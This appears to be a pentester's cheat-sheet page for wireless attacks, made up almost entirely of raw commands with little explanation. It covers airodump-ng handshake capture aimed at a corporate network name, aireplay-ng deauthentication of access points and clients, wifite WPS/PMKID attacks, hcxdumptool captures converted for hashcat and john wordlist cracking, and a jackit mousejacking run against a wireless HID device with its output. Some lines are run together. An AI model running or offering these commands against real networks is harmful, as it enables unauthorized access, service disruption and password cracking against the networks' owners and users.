WiFi
Tips
sudo kismet
sudo systemctl stop NetworkManager.service
sudo systemctl stop wpa_supplicant.service
sudo airodump-ng -c 11 --bssid=D0:D3:E0:47:B0:01 -w psk wlp0s20f3mon
sudo airodump-ng -c 11 --essid-regex XX-Corporate -w psk wlp0s20f3mon
Deauth
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 wlp0s20f3mon
Target client:
sudo aireplay-ng -0 1 -a D0:D3:E0:47:B0:01 -c xx:xx:xx:xx wlp0s20f3monwctl
:> iwctl
NetworkConfigurationEnabled: disabled
StateDirectory: /var/lib/iwd
Version: 2.15
[iwd]# station 
list  wlan1 
[iwd]# station wlan1 scan
[iwd]# station wlan1 get-networks 
wifite
sudo wifite
WPS:
wifite -e nomedarede
wifite -e rede --pmkid
wifite -c 10 -(hidden SSids)
wifite --wep
wifite --crack
https://github.com/derv82/wifite2htcxdumptool
sudo hcxdumptool -i wlan3 -w output
hcxpcapngtool -o hashcat output --prefix=hash2200 --john=cracking_john --all
Get all the obtained networks:
cat cracking_john | cut -d ":" -f1 | uniq 
john --wordlist=/usr/share/wordlists/wifite.txt cracking_john nRFID
sudo ./jackit  --script script.txt 
[+] Scanning every 5s CTRL-C when ready.
  KEY  ADDRESS           CHANNELS    COUNT  SEEN         TYPE        PACKET
-----  --------------  ----------  -------  -----------  ----------  -----------------
    1  E7:40:62:76:02          79        2  0:03:49 ago  Amazon HID  02:FC:EF:FF:02:5D
    2  37:DD:35:EA:10  23,41             4  0:01:29 ago  Unknown  02:09:D0:FF:47
[+] Select target keys (1-1) separated by commas, or 'all':  [all]: 1   
[+] Ping success on channel 2
[+] Sending attack to E7:40:62:76:02 [Amazon HID] on channel 2
[+] All attacks completed
DELAY 500
GUI r 
DELAY 500
STRING notepad.exe  
ENTER 
DELAY 1000 
STRING Hello World! References
Last updated
Was this helpful?

